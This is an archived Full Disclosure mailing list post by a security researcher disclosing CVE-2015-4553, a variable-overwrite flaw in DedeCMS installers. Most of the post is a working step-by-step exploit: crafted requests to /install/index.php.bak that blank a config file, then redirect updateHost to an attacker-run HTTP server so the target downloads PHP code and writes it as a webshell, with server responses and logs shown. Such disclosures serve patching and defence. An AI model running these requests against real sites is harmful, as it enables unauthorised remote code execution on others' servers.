Full Disclosure mailing list archives
[CVE-2015-4553]Dedecms variable coverage leads to getshell
From: zise.shi <zise.shi () dbappsecurity com cn>
Date: Wed, 17 Jun 2015 15:37:07 +0800
[CVE-2015-4553]Dedecms variable coverage leads to getshell ############################################################################# # # DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/ # ############################################################################# # # CVE ID: CVE-2015-4553 # Subject: Dedecms variable coverage leads to getshell # Author: zise # Date: 06.17.2015 ############################################################################# Introduction: ======== dedecms Open source cms Extensive application Influence version Newest dedecms 5.7-sp1 and all old version Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Step 1 ############################################################################# Clear file contents config_update.php ====File content==== <?php $updateHost = 'http://updatenew.dedecms.com/base-v57/'; $linkHost = 'http://flink.dedecms.com/server_url.php'; ======== http://192.168.204.135/install/index.php.bak ?step=11 &insLockfile=a &s_lang=a &install_demo_name=../data/admin/config_update.php ### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 06:55:23 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: User-Agent Content-Length: 55 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <font color="red">[×]</font> 远程获取失败 ### ###After execution file 0 byte ~ho~year~#### 2015/06/17 14:55 0 config_update.php 1 file 0 byte Step 2 ############################################################################# Create local HTTP services zise:tmp zise$ ifconfig en0 en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 119.253.3.18 netmask 0xffffff00 broadcast zise:tmp zise$ mkdir "dedecms" zise:tmp zise$ cd dedecms/ zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt zise:dedecms zise$ cd ../ zise:tmp zise$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 - #### http://192.168.204.135/install/index.php.bak ?step=11 &insLockfile=a &s_lang=a &install_demo_name=hello.php &updateHost=http://119.253.3.18:8000/ #### HTTP/1.1 200 OK Date: Wed, 17 Jun 2015 07:11:18 GMT Server: Apache/2.4.12 X-Powered-By: PHP/5.6.6 Vary: Accept-Encoding,User-Agent Content-Length: 81 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <font color="green">[√]</font> 存在(您可以选择安装进行体验) Attack complete you webshell http://192.168.204.135/install/hello.php ====================== zise ^_^ zise.shi () dbappsecurity com cn Security researcher _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- [CVE-2015-4553]Dedecms variable coverage leads to getshell zise . shi (Jun 17)